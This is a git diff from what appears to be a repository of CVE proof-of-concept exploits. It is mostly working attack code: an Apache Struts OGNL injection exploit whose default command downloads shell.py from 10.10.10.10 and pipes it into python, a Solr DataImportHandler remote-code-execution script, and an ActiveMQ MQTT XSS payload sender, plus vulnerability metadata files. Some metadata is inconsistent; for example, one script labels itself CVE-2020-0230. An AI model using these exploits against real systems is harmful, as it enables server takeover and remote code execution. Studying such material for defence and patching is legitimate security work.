-            verify=False,
-            allow_redirects=self.redirect,
-            headers=self.headers,
-            cookies=self.cookies,
-            proxies=self.proxies,
-            params=params
-        )
-
-    def debug(self):
-        try:
-            import http.client as http_client
-        except ImportError:
-            import httplib as http_client
-        http_client.HTTPConnection.debuglevel = 1
-        logging.basicConfig()
-        logging.getLogger().setLevel(logging.DEBUG)
-        requests_log = logging.getLogger("requests.packages.urllib3")
-        requests_log.setLevel(logging.DEBUG)
-        requests_log.propagate = True
-        return self
-
-    def send_payload(self, command='curl --insecure -sv
-https://10.10.10.10/shell.py|python -'):
-        url = self.target
-        stdout.write('sending payload to %s payload %s' % (url, command))
-        resp = self.do_post(url=url, params=self.query_params,
-data=self.payload.replace('{COMMAND}', command))
-        return resp
-
-
-if __name__ == '__main__':
-    parser = argparse.ArgumentParser(add_help=True,
-                                     description='CVE-2020-0230 Struts
-2 exploit')
-    try:
-        parser.add_argument('-target', action='store', help='Target
-address: http(s)://target.com/index.action')
-        parser.add_argument('-command', action='store',
-                            help='Command to execute: touch /tmp/pwn')
-        parser.add_argument('-debug', action='store', default=False,
-help='Enable debugging: False')
-        parser.add_argument('-proxy', action='store', default='',
-help='Enable proxy: 10.10.10.10:8080')
-
-        if len(argv) == 1:
-            parser.print_help()
-            exit(1)
-        options = parser.parse_args()
-
-        exp = Exploit(
-            proxy_address=options.proxy,
-            target=options.target
-        )
-
-        if options.debug:
-            exp.debug()
-            stdout.write('target %s debug %s proxy %s\n' % (
-                options.target, options.debug, options.proxy
-            ))
-
-        result = exp.send_payload(command=options.command)
-        stdout.write('Response: %d\n' % result.status_code)
-
-    except Exception as error:
-
+# Exploit Title: Apache Struts 2.5.20 - Double OGNL evaluation
+# Date: 08/18/2020
+# Exploit Author: West Shepherd
+# Vendor Homepage: https://struts.apache.org/download.cgi
+# Version: Struts 2.0.0 - Struts 2.5.20 (S2-059)
+# CVE : CVE-2019-0230
+# Credit goes to reporters Matthias Kaiser, Apple InformationSecurity, and the Github example from PrinceFPF.
+# Source(s):
+# https://github.com/PrinceFPF/CVE-2019-0230
+# https://cwiki.apache.org/confluence/display/WW/S2-059
+# *Fix it, upgrade to: https://cwiki.apache.org/confluence/display/WW/Version+Notes+2.5.22
+
+# !/usr/bin/python
+from sys import argv, exit, stdout, stderr
+import argparse
+import requests
+from requests.packages.urllib3.exceptions import InsecureRequestWarning
+import logging
+
+
+class Exploit:
+    def __init__(
+            self,
+            target='',
+            redirect=False,
+            proxy_address=''
+    ):
+        requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
+        self.target = target
+        self.session = requests.session()
+        self.redirect = redirect
+        self.timeout = 0.5
+        self.proxies = {
+            'http': 'http://%s' % proxy_address,
+            'https': 'http://%s' % proxy_address
+        } \
+            if proxy_address is not None \
+               and proxy_address != '' else {}
+        self.query_params = {}
+        self.form_values = {}
+        self.cookies = {}
+        boundary = "---------------------------735323031399963166993862150"
+        self.headers = {
+            'Content-Type': 'multipart/form-data; boundary=%s' % boundary,
+            'Accept': '*/*',
+            'Connection': 'close'
+        }
+        payload = "%{(#nike='multipart/form-data')." \
+                  "(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)." \
+                  "(#_memberAccess?(#_memberAccess=#dm):" \
+
+"((#container=#context['com.opensymphony.xwork2.ActionContext.container'])."
+\
+
+"(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))."
+\
+                  "(#ognlUtil.getExcludedPackageNames().clear())." \
+                  "(#ognlUtil.getExcludedClasses().clear())." \
+                  "(#context.setMemberAccess(#dm)))).(#cmd='{COMMAND}')." \
+
+"(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win')))."
+\
+
+"(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd}))." \
+                  "(#p=new
+java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true))." \
+
+"(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse()."
+\
+
+"getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros))."
+\
+                  "(#ros.flush())}"
+
+        self.payload = "--%s\r\nContent-Disposition: form-data;
+name=\"foo\"; " \
+                       "filename=\"%s\0b\"\r\nContent-Type:
+text/plain\r\n\r\nx\r\n--%s--\r\n\r\n" % (
+                           boundary, payload, boundary
+                       )
+
+    def do_get(self, url, params=None, data=None):
+        return self.session.get(
+            url=url,
+            verify=False,
+            allow_redirects=self.redirect,
+            headers=self.headers,
+            cookies=self.cookies,
+            proxies=self.proxies,
+            data=data,
+            params=params
+        )
+
+    def do_post(self, url, data=None, params=None):
+        return self.session.post(
+            url=url,
+            data=data,
+            verify=False,
+            allow_redirects=self.redirect,
+            headers=self.headers,
+            cookies=self.cookies,
+            proxies=self.proxies,
+            params=params
+        )
+
+    def debug(self):
+        try:
+            import http.client as http_client
+        except ImportError:
+            import httplib as http_client
+        http_client.HTTPConnection.debuglevel = 1
+        logging.basicConfig()
+        logging.getLogger().setLevel(logging.DEBUG)
+        requests_log = logging.getLogger("requests.packages.urllib3")
+        requests_log.setLevel(logging.DEBUG)
+        requests_log.propagate = True
+        return self
+
+    def send_payload(self, command='curl --insecure -sv
+https://10.10.10.10/shell.py|python -'):
+        url = self.target
+        stdout.write('sending payload to %s payload %s' % (url, command))
+        resp = self.do_post(url=url, params=self.query_params,
+data=self.payload.replace('{COMMAND}', command))
+        return resp
+
+
+if __name__ == '__main__':
+    parser = argparse.ArgumentParser(add_help=True,
+                                     description='CVE-2020-0230 Struts
+2 exploit')
+    try:
+        parser.add_argument('-target', action='store', help='Target
+address: http(s)://target.com/index.action')
+        parser.add_argument('-command', action='store',
+                            help='Command to execute: touch /tmp/pwn')
+        parser.add_argument('-debug', action='store', default=False,
+help='Enable debugging: False')
+        parser.add_argument('-proxy', action='store', default='',
+help='Enable proxy: 10.10.10.10:8080')
+
+        if len(argv) == 1:
+            parser.print_help()
+            exit(1)
+        options = parser.parse_args()
+
+        exp = Exploit(
+            proxy_address=options.proxy,
+            target=options.target
+        )
+
+        if options.debug:
+            exp.debug()
+            stdout.write('target %s debug %s proxy %s\n' % (
+                options.target, options.debug, options.proxy
+            ))
+
+        result = exp.send_payload(command=options.command)
+        stdout.write('Response: %d\n' % result.status_code)
+
+    except Exception as error:
+
 stderr.write('error in main %s' % str(error))
\ No newline at end of file
diff --git a/cve/apache-Struts/2019/CVE-2019-0230/README.md b/cve/apache-Struts/2019/CVE-2019-0230/README.md
index b9a4f94c..94d8caa3 100644
--- a/cve/apache-Struts/2019/CVE-2019-0230/README.md
+++ b/cve/apache-Struts/2019/CVE-2019-0230/README.md
@@ -1,21 +1,21 @@
-# Apache Struts 2.5.20 - Double OGNL evaluation  
-Exploit Author: Lucas Souza https://lsass.io  
-Vendor Homepage:  https://apache.org/  
-Version: 2.4.49  
-Tested on: 2.4.49  
-CVE : CVE-2019-0230  
-Credits: Ash Daulton and the cPanel Security Team  
-# Usage
-```
-python CVE-2019-0230.py  + 
--target   : Target address
--command  : Command to execute
--debug    : Enable debugging
--proxy    : Enable proxy
-```
-# reference
-http://packetstormsecurity.com/files/160108/Apache-Struts-2.5.20-Double-OGNL-Evaluation.html  
-http://packetstormsecurity.com/files/160721/Apache-Struts-2-Forced-Multi-OGNL-Evaluation.html  
-https://cwiki.apache.org/confluence/display/ww/s2-059  
-https://launchpad.support.sap.com/#/notes/2982840  
+# Apache Struts 2.5.20 - Double OGNL evaluation  
+Exploit Author: Lucas Souza https://lsass.io  
+Vendor Homepage:  https://apache.org/  
+Version: 2.4.49  
+Tested on: 2.4.49  
+CVE : CVE-2019-0230  
+Credits: Ash Daulton and the cPanel Security Team  
+# Usage
+```
+python CVE-2019-0230.py  + 
+-target   : Target address
+-command  : Command to execute
+-debug    : Enable debugging
+-proxy    : Enable proxy
+```
+# reference
+http://packetstormsecurity.com/files/160108/Apache-Struts-2.5.20-Double-OGNL-Evaluation.html  
+http://packetstormsecurity.com/files/160721/Apache-Struts-2-Forced-Multi-OGNL-Evaluation.html  
+https://cwiki.apache.org/confluence/display/ww/s2-059  
+https://launchpad.support.sap.com/#/notes/2982840  
 https://www.oracle.com/security-alerts/cpujan2021.html
\ No newline at end of file
diff --git a/cve/apache-Struts/2019/yaml/CVE-2019-0230.yaml b/cve/apache-Struts/2019/yaml/CVE-2019-0230.yaml
index e1e4a6e8..819ec7b5 100644
--- a/cve/apache-Struts/2019/yaml/CVE-2019-0230.yaml
+++ b/cve/apache-Struts/2019/yaml/CVE-2019-0230.yaml
@@ -1,24 +1,24 @@
-id: CVE-2019-0230
-source: https://www.exploit-db.com/exploits/49068
-info:
-  name: Apache Struts是一个用于构建基于Java的web应用程序的模型-视图-控制器(MVC)框架。
-  severity: critical
-  description:
-    Apache Struts框架, 会对某些特定的标签的属性值，比如id属性进行二次解析，所以攻击者可以传递将在呈现标签属性时再次解析OGNL表达式，造成OGNL表达式注入。从而可能造成远程执行代码。
-  scope-of-influence:
-    Struts 2.0.0 - Struts 2.5.20
-  reference:
-    - http://packetstormsecurity.com/files/160108/Apache-Struts-2.5.20-Double-OGNL-Evaluation.html
-    - https://cwiki.apache.org/confluence/display/ww/s2-059
-    - http://packetstormsecurity.com/files/160721/Apache-Struts-2-Forced-Multi-OGNL-Evaluation.html
-    - https://launchpad.support.sap.com/#/notes/2982840
-    - https://www.oracle.com/security-alerts/cpuApr2021.html
-  classification:
-    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
-    cvss-score: 9.8
-    cve-id: CVE-2019-0230
-    cwe-id: CWE-1321
-    cnvd-id: None
-    kve-id: None
-  tags: 
-    - 远程命令执行
+id: CVE-2019-0230
+source: https://www.exploit-db.com/exploits/49068
+info:
+  name: Apache Struts是一个用于构建基于Java的web应用程序的模型-视图-控制器(MVC)框架。
+  severity: critical
+  description:
+    Apache Struts框架, 会对某些特定的标签的属性值，比如id属性进行二次解析，所以攻击者可以传递将在呈现标签属性时再次解析OGNL表达式，造成OGNL表达式注入。从而可能造成远程执行代码。
+  scope-of-influence:
+    Struts 2.0.0 - Struts 2.5.20
+  reference:
+    - http://packetstormsecurity.com/files/160108/Apache-Struts-2.5.20-Double-OGNL-Evaluation.html
+    - https://cwiki.apache.org/confluence/display/ww/s2-059
+    - http://packetstormsecurity.com/files/160721/Apache-Struts-2-Forced-Multi-OGNL-Evaluation.html
+    - https://launchpad.support.sap.com/#/notes/2982840
+    - https://www.oracle.com/security-alerts/cpuApr2021.html
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2019-0230
+    cwe-id: CWE-1321
+    cnvd-id: None
+    kve-id: None
+  tags: 
+    - 远程命令执行
diff --git a/cve/apache-activemq/2020/CVE-2020-13932/poc.py b/cve/apache-activemq/2020/CVE-2020-13932/poc.py
index d85d0d51..62973a9b 100644
--- a/cve/apache-activemq/2020/CVE-2020-13932/poc.py
+++ b/cve/apache-activemq/2020/CVE-2020-13932/poc.py
@@ -1,22 +1,22 @@
-import time
-import socket
-from scapy.contrib.mqtt import *
-from scapy.compat import raw
-
-brokerIP = ""  # input the server IP here
-brokerPort = 1883  # The default listen port of MQTT is 1883
-clientid = "<script>alert(0)</script>" #Malformed Clientid
-malformedTopic = "<img src=\"1.1.1.1\" onerror=\"alert(1)\">"  # Malformed Topic
-
-if __name__ == '__main__':
-    connMessage = MQTT() / MQTTConnect(protoname="MQTT", protolevel=4, clientId=clientid)
-    # Malformed Connect Message
-    subMessage = MQTT(QOS=1) / MQTTSubscribe(topics=MQTTTopicQOS(topic=malformedTopic, QOS=0), msgid=1)
-    # Malformed Subscribe Message
-    conn = socket.socket()
-    conn.connect((brokerIP, brokerPort))
-    conn.send(raw(connMessage))
-    time.sleep(1)
-    conn.send(raw(subMessage))
-    input() # Keep the MQTT Connection
-    conn.close()
+import time
+import socket
+from scapy.contrib.mqtt import *
+from scapy.compat import raw
+
+brokerIP = ""  # input the server IP here
+brokerPort = 1883  # The default listen port of MQTT is 1883
+clientid = "<script>alert(0)</script>" #Malformed Clientid
+malformedTopic = "<img src=\"1.1.1.1\" onerror=\"alert(1)\">"  # Malformed Topic
+
+if __name__ == '__main__':
+    connMessage = MQTT() / MQTTConnect(protoname="MQTT", protolevel=4, clientId=clientid)
+    # Malformed Connect Message
+    subMessage = MQTT(QOS=1) / MQTTSubscribe(topics=MQTTTopicQOS(topic=malformedTopic, QOS=0), msgid=1)
+    # Malformed Subscribe Message
+    conn = socket.socket()
+    conn.connect((brokerIP, brokerPort))
+    conn.send(raw(connMessage))
+    time.sleep(1)
+    conn.send(raw(subMessage))
+    input() # Keep the MQTT Connection
+    conn.close()
diff --git a/cve/apache-activemq/2020/yaml/CVE-2020-13932.yaml b/cve/apache-activemq/2020/yaml/CVE-2020-13932.yaml
index 1fa394da..07b1b496 100644
--- a/cve/apache-activemq/2020/yaml/CVE-2020-13932.yaml
+++ b/cve/apache-activemq/2020/yaml/CVE-2020-13932.yaml
@@ -1,21 +1,21 @@
-id: CVE-2020-13932
-source: Original
-info:
-  name: Apache ActiveMQ Artemis Clientid XSS
-  severity: Medium
-  description: |
-    In Apache ActiveMQ Artemis 2.5.0 to 2.13.0, a specially crafted MQTT packet which has an XSS payload as client-id or topic name can exploit this vulnerability. The XSS payload is being injected into the admin console's browser. The XSS payload is triggered in the diagram plugin; queue node and the info section.
-  scope-of-influence:
-    Apache ActiveMQ Artemis 2.5.0 to 2.13.0
-  reference:
-    https://activemq.apache.org/security-advisories.data/CVE-2020-13932-announcement.txt
-    https://activemq.apache.org/security-advisories.data/CVE-2020-13932-announcement.txt
-    https://lists.apache.org/thread.html/r7fcedcc89e5f296b174d6b8c1438c607c30d809c04292e5732d6e4eb@%3Cusers.activemq.apache.org%3E
-  classification:
-    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
-    cvss-score: 6.1
-    cve-id: CVE-2020-13932
-    cwe-id: CWE-79
-    cnvd-id: None
-    kve-id: None
+id: CVE-2020-13932
+source: Original
+info:
+  name: Apache ActiveMQ Artemis Clientid XSS
+  severity: Medium
+  description: |
+    In Apache ActiveMQ Artemis 2.5.0 to 2.13.0, a specially crafted MQTT packet which has an XSS payload as client-id or topic name can exploit this vulnerability. The XSS payload is being injected into the admin console's browser. The XSS payload is triggered in the diagram plugin; queue node and the info section.
+  scope-of-influence:
+    Apache ActiveMQ Artemis 2.5.0 to 2.13.0
+  reference:
+    https://activemq.apache.org/security-advisories.data/CVE-2020-13932-announcement.txt
+    https://activemq.apache.org/security-advisories.data/CVE-2020-13932-announcement.txt
+    https://lists.apache.org/thread.html/r7fcedcc89e5f296b174d6b8c1438c607c30d809c04292e5732d6e4eb@%3Cusers.activemq.apache.org%3E
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.1
+    cve-id: CVE-2020-13932
+    cwe-id: CWE-79
+    cnvd-id: None
+    kve-id: None
   tags: XSS
\ No newline at end of file
diff --git a/cve/apache-commons-text/2022/yaml/CVE-2022-42889.yaml b/cve/apache-commons-text/2022/yaml/CVE-2022-42889.yaml
index 991427c4..6d7583ba 100644
--- a/cve/apache-commons-text/2022/yaml/CVE-2022-42889.yaml
+++ b/cve/apache-commons-text/2022/yaml/CVE-2022-42889.yaml
@@ -1,20 +1,20 @@
-id: CVE-2022-42889
-source: https://github.com/rhitikwadhvana/CVE-2022-42889-Text4Shell-Exploit-POC
-info:
-  name: Apache Commons Text项目实现了一系列关于文本字符串的算法，专注于处理字符串和文本块。
-  severity: CRITICAL
-  description:
-    Apache Commons Text 1.10.0版本之前允许对文本进行相关的变量解析。在Apache Commons Text版本1.5～1.9中，攻击者可构造恶意文本，由于不安全的插值默认值，当输入的参数不受信任时，可能导致远程代码执行。
-  scope-of-influence:
-    1.5 <= Apache Commons Text <= 1.9
-  reference:
-    - https://nvd.nist.gov/vuln/detail/CVE-2022-42889
-    - https://zhuanlan.zhihu.com/p/575580463
-  classification:
-    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
-    cvss-score: 9.8
-    cve-id: CVE-2022-42889
-    cwe-id: CWE-94
-    cnvd-id: None
-    kve-id: None
+id: CVE-2022-42889
+source: https://github.com/rhitikwadhvana/CVE-2022-42889-Text4Shell-Exploit-POC
+info:
+  name: Apache Commons Text项目实现了一系列关于文本字符串的算法，专注于处理字符串和文本块。
+  severity: CRITICAL
+  description:
+    Apache Commons Text 1.10.0版本之前允许对文本进行相关的变量解析。在Apache Commons Text版本1.5～1.9中，攻击者可构造恶意文本，由于不安全的插值默认值，当输入的参数不受信任时，可能导致远程代码执行。
+  scope-of-influence:
+    1.5 <= Apache Commons Text <= 1.9
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-42889
+    - https://zhuanlan.zhihu.com/p/575580463
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2022-42889
+    cwe-id: CWE-94
+    cnvd-id: None
+    kve-id: None
   tags: CVE-2022, Apache Commons Text
\ No newline at end of file
diff --git a/cve/apache-log4j/2021/CVE-2021-44228/poc.py b/cve/apache-log4j/2021/CVE-2021-44228/poc.py
old mode 100755
new mode 100644
diff --git a/cve/apache-solr/2019/CVE-2019-0193/CVE-2019-0193.py b/cve/apache-solr/2019/CVE-2019-0193/CVE-2019-0193.py
index bf16b9fe..58a5b454 100644
--- a/cve/apache-solr/2019/CVE-2019-0193/CVE-2019-0193.py
+++ b/cve/apache-solr/2019/CVE-2019-0193/CVE-2019-0193.py
@@ -1,91 +1,91 @@
-import requests
-import json
-import sys
-
-
-banner = '''
-   _______      ________    ___   ___  __  ___          ___  __  ___ ____  
-  / ____\ \    / /  ____|  |__ \ / _ \/_ |/ _ \        / _ \/_ |/ _ \___ \ 
- | |     \ \  / /| |__ ______ ) | | | || | (_) |______| | | || | (_) |__) |
- | |      \ \/ / |  __|______/ /| | | || |\__, |______| | | || |\__, |__ < 
- | |____   \  /  | |____    / /_| |_| || |  / /       | |_| || |  / /___) |
-  \_____|   \/   |______|  |____|\___/ |_| /_/         \___/ |_| /_/|____/ 
-                                                                           
-                          python By jas502n                                              
-'''
-print banner
-
-def admin_cores(url, cmd):
-    core_selector_url = url + '/solr/admin/cores?_=1565526689592&indexInfo=false&wt=json'
-    r = requests.get(url=core_selector_url)
-    json_strs = json.loads(r.text)
-    if r.status_code ==200 and "responseHeader" in r.text:
-        print "\nHere Have %s Core_name Exit!\n" % str(len(json_strs['status']))
-        for core_selector in json_strs['status']:
-            jas502n_Core_Name = json_strs['status']['%s'%core_selector]['name']
-            print '\n>>>>The Core Name = %s' % jas502n_Core_Name
-            show_config(url,jas502n_Core_Name)
-            get_config_name(url,jas502n_Core_Name)
-            URLDataSource_Poc(url,jas502n_Core_Name,cmd)
-            
-    else:
-        print "No core_selector Exit!"
-    
-
-
-        
-def show_config(url,jas502n_Core_Name):
-    config_url = url + "/solr/"+ jas502n_Core_Name +"/dataimport?_=1565530241159&command=show-config&indent=on&wt=json"
-    r1 = requests.get(config_url)
-    
-    if r1.status_code ==200 and 'dataConfig' in r1.text:
-        print ">> config_url= %s"% config_url
-        print ">%s dataConfig Exit!" % jas502n_Core_Name
-    else:
-        print "dataConfig No Exit!"
-
-
-
-def get_config_name(url,jas502n_Core_Name):
-    get_config_url = url + '/solr/'+ jas502n_Core_Name +'/dataimport?_=1565530241159&command=status&indent=on&wt=json'
-    r2 = requests.get(get_config_url)
-    if r2.status_code ==200 and 'config' in r2.text:
-        print ">> get_config_url= %s" % get_config_url
-        r2_json = json.loads(r2.text)
-        r2_str = r2_json['initArgs']
-        
-        print '>get_config_name= %s' % r2_str[1][1]
-        
-    else:
-        print "Core Config Name No Exit!"
-
-
-
-def URLDataSource_Poc(url,jas502n_Core_Name,cmd):
-    debug_model_url = url + '/solr/'+ jas502n_Core_Name +'/dataimport?_=1565530241159&indent=on&wt=json'
-    payload = "command=full-import&verbose=false&clean=true&commit=true&debug=true&core=atom&dataConfig=%%3CdataConfig%%3E%%0A++%%3CdataSource+type%%3D%%22URLDataSource%%22%%2F%%3E%%0A++%%3Cscript%%3E%%3C!%%5BCDATA%%5B%%0A++++++++++function+poc()%%7B+java.lang.Runtime.getRuntime().exec(%%22%s%%22)%%3B%%0A++++++++++%%7D%%0A++%%5D%%5D%%3E%%3C%%2Fscript%%3E%%0A++%%3Cdocument%%3E%%0A++++%%3Centity+name%%3D%%22stackoverflow%%22%%0A++++++++++++url%%3D%%22https%%3A%%2F%%2Fstackoverflow.com%%2Ffeeds%%2Ftag%%2Fsolr%%22%%0A++++++++++++processor%%3D%%22XPathEntityProcessor%%22%%0A++++++++++++forEach%%3D%%22%%2Ffeed%%22%%0A++++++++++++transformer%%3D%%22script%%3Apoc%%22+%%2F%%3E%%0A++%%3C%%2Fdocument%%3E%%0A%%3C%%2FdataConfig%%3E&name=dataimport" % cmd
-    headers = {
-    "User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0",
-    "Accept": "application/json, text/plain, */*",
-    "Accept-Language":"zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3",
-    "Accept-Encoding":"gzip, deflate",
-    "Content-type":"application/x-www-form-urlencoded",
-    "X-Requested-With":"XMLHttpRequest",
-    "Referer":"http://%s/solr/" % url
-
-    }
-    r3 = requests.post(url = debug_model_url, data=payload,headers=headers)
-    print ">>>>> debug_model_url= %s" % debug_model_url
-    if r3.status_code ==200 and 'Requests' in r3.text:
-
-        print "Send Poc Success!"
-    else:
-        print "No Send Poc Success!"
-        print r3.text
-
-
-
-if __name__ == '__main__':
-    cmd = sys.argv[2]
-    url = sys.argv[1]
+import requests
+import json
+import sys
+
+
+banner = '''
+   _______      ________    ___   ___  __  ___          ___  __  ___ ____  
+  / ____\ \    / /  ____|  |__ \ / _ \/_ |/ _ \        / _ \/_ |/ _ \___ \ 
+ | |     \ \  / /| |__ ______ ) | | | || | (_) |______| | | || | (_) |__) |
+ | |      \ \/ / |  __|______/ /| | | || |\__, |______| | | || |\__, |__ < 
+ | |____   \  /  | |____    / /_| |_| || |  / /       | |_| || |  / /___) |
+  \_____|   \/   |______|  |____|\___/ |_| /_/         \___/ |_| /_/|____/ 
+                                                                           
+                          python By jas502n                                              
+'''
+print banner
+
+def admin_cores(url, cmd):
+    core_selector_url = url + '/solr/admin/cores?_=1565526689592&indexInfo=false&wt=json'
+    r = requests.get(url=core_selector_url)
+    json_strs = json.loads(r.text)
+    if r.status_code ==200 and "responseHeader" in r.text:
+        print "\nHere Have %s Core_name Exit!\n" % str(len(json_strs['status']))
+        for core_selector in json_strs['status']:
+            jas502n_Core_Name = json_strs['status']['%s'%core_selector]['name']
+            print '\n>>>>The Core Name = %s' % jas502n_Core_Name
+            show_config(url,jas502n_Core_Name)
+            get_config_name(url,jas502n_Core_Name)
+            URLDataSource_Poc(url,jas502n_Core_Name,cmd)
+            
+    else:
+        print "No core_selector Exit!"
+    
+
+
+        
+def show_config(url,jas502n_Core_Name):
+    config_url = url + "/solr/"+ jas502n_Core_Name +"/dataimport?_=1565530241159&command=show-config&indent=on&wt=json"
+    r1 = requests.get(config_url)
+    
+    if r1.status_code ==200 and 'dataConfig' in r1.text:
+        print ">> config_url= %s"% config_url
+        print ">%s dataConfig Exit!" % jas502n_Core_Name
+    else:
+        print "dataConfig No Exit!"
+
+
+
+def get_config_name(url,jas502n_Core_Name):
+    get_config_url = url + '/solr/'+ jas502n_Core_Name +'/dataimport?_=1565530241159&command=status&indent=on&wt=json'
+    r2 = requests.get(get_config_url)
+    if r2.status_code ==200 and 'config' in r2.text:
+        print ">> get_config_url= %s" % get_config_url
+        r2_json = json.loads(r2.text)
+        r2_str = r2_json['initArgs']
+        
+        print '>get_config_name= %s' % r2_str[1][1]
+        
+    else:
+        print "Core Config Name No Exit!"
+
+
+
+def URLDataSource_Poc(url,jas502n_Core_Name,cmd):
+    debug_model_url = url + '/solr/'+ jas502n_Core_Name +'/dataimport?_=1565530241159&indent=on&wt=json'
+    payload = "command=full-import&verbose=false&clean=true&commit=true&debug=true&core=atom&dataConfig=%%3CdataConfig%%3E%%0A++%%3CdataSource+type%%3D%%22URLDataSource%%22%%2F%%3E%%0A++%%3Cscript%%3E%%3C!%%5BCDATA%%5B%%0A++++++++++function+poc()%%7B+java.lang.Runtime.getRuntime().exec(%%22%s%%22)%%3B%%0A++++++++++%%7D%%0A++%%5D%%5D%%3E%%3C%%2Fscript%%3E%%0A++%%3Cdocument%%3E%%0A++++%%3Centity+name%%3D%%22stackoverflow%%22%%0A++++++++++++url%%3D%%22https%%3A%%2F%%2Fstackoverflow.com%%2Ffeeds%%2Ftag%%2Fsolr%%22%%0A++++++++++++processor%%3D%%22XPathEntityProcessor%%22%%0A++++++++++++forEach%%3D%%22%%2Ffeed%%22%%0A++++++++++++transformer%%3D%%22script%%3Apoc%%22+%%2F%%3E%%0A++%%3C%%2Fdocument%%3E%%0A%%3C%%2FdataConfig%%3E&name=dataimport" % cmd
+    headers = {
+    "User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0",
+    "Accept": "application/json, text/plain, */*",
+    "Accept-Language":"zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3",
+    "Accept-Encoding":"gzip, deflate",
+    "Content-type":"application/x-www-form-urlencoded",
+    "X-Requested-With":"XMLHttpRequest",
+    "Referer":"http://%s/solr/" % url
+
+    }
+    r3 = requests.post(url = debug_model_url, data=payload,headers=headers)
+    print ">>>>> debug_model_url= %s" % debug_model_url
+    if r3.status_code ==200 and 'Requests' in r3.text:
+
+        print "Send Poc Success!"
+    else:
+        print "No Send Poc Success!"
+        print r3.text
+
+
+
+if __name__ == '__main__':
+    cmd = sys.argv[2]
+    url = sys.argv[1]
     admin_cores(url,cmd)
\ No newline at end of file
diff --git a/cve/apache-solr/2019/CVE-2019-0193/README.md b/cve/apache-solr/2019/CVE-2019-0193/README.md
index a19fa0a1..655c6d93 100644
--- a/cve/apache-solr/2019/CVE-2019-0193/README.md
+++ b/cve/apache-solr/2019/CVE-2019-0193/README.md
@@ -1,9 +1,9 @@
-# CVE-2019-0193 Solr DataImport Handler RCE (RCE-Vuln < solr v8.12)
-
-## 描述
-
-Apache Solr是美国阿帕奇（Apache）软件基金会的一款基于Lucene（一款全文搜索引擎）的搜索服务器。该产品支持层面搜索、垂直搜索、高亮显示搜索结果等。Apache Solr的DataImportHandler是一个可选但常用的模块，可从数据库（通过JDBC）、RSS、Web 页面和文件中导入数据。而且这个模块的配置文件不仅可以在服务端中通过配置文件指定，也可以从用户请求的dataConfig中获取。
-
-## 用法
-
+# CVE-2019-0193 Solr DataImport Handler RCE (RCE-Vuln < solr v8.12)
+
+## 描述
+
+Apache Solr是美国阿帕奇（Apache）软件基金会的一款基于Lucene（一款全文搜索引擎）的搜索服务器。该产品支持层面搜索、垂直搜索、高亮显示搜索结果等。Apache Solr的DataImportHandler是一个可选但常用的模块，可从数据库（通过JDBC）、RSS、Web 页面和文件中导入数据。而且这个模块的配置文件不仅可以在服务端中通过配置文件指定，也可以从用户请求的dataConfig中获取。
+
+## 用法
+
 ```python CVE-2019-0193.py http://192.168.2.18:8983 "calc"```
\ No newline at end of file
diff --git a/cve/apache-solr/2019/yaml/CVE-2019-0193.yaml b/cve/apache-solr/2019/yaml/CVE-2019-0193.yaml
index a3f83d64..35ac0fe4 100644
--- a/cve/apache-solr/2019/yaml/CVE-2019-0193.yaml
+++ b/cve/apache-solr/2019/yaml/CVE-2019-0193.yaml
@@ -1,40 +1,40 @@
-id: CVE-2019-0193
-source: https://github.com/jas502n/CVE-2019-0193
-info:
-  name: Apache Solr是美国阿帕奇（Apache）基金会的一款基于Lucene（一款全文搜索引擎）的搜索服务器。该产品支持层面搜索、垂直搜索、高亮显示搜索结果等。
-  severity: high
-  description:
-    在Apache Solr中，DataImportHandler是一个可选但常用的模块，用于从数据库和其他源中提取数据，它具有一个功能，其中整个DIH配置可以来自请求的“dataConfig”参数。 DIH管理界面的调试模式使用它来方便调试/开发DIH配置。由于DIH配置可以包含脚本，因此该参数存在安全风险。从Solr的8.2.0版开始，使用此参数需要将Java System属性“enable.dih.dataConfigParam”设置为true。
-  scope-of-influence:
-    Apache Solr < 8.2.0
-  reference:
-    - https://issues.apache.org/jira/browse/SOLR-13669
-    - https://lists.apache.org/thread.html/1addbb49a1fc0947fb32ca663d76d93cfaade35a4848a76d4b4ded9c@%3Cissues.lucene.apache.org%3E	
-    - https://lists.apache.org/thread.html/42cc4d334ba33905b872a0aa00d6a481391951c8b1450f01b077ce74@%3Cissues.lucene.apache.org%3E	
-    - https://lists.apache.org/thread.html/55880d48e38ba9e8c41a3b9e41051dbfdef63b86b0cfeb32967edf03@%3Cissues.lucene.apache.org%3E	
-    - https://lists.apache.org/thread.html/6f2d61bd8732224c5fd3bdd84798f8e01e4542d3ee2f527a52a81b83@%3Cissues.lucene.apache.org%3E	
-    - https://lists.apache.org/thread.html/7143983363f0ba463475be4a8b775077070a08dbf075449b7beb51ee@%3Cissues.lucene.apache.org%3E	
-    - https://lists.apache.org/thread.html/9b0e7a7e3e18d0724f511403b364fc082ff56e3134d84cfece1c82fc@%3Cissues.lucene.apache.org%3E	
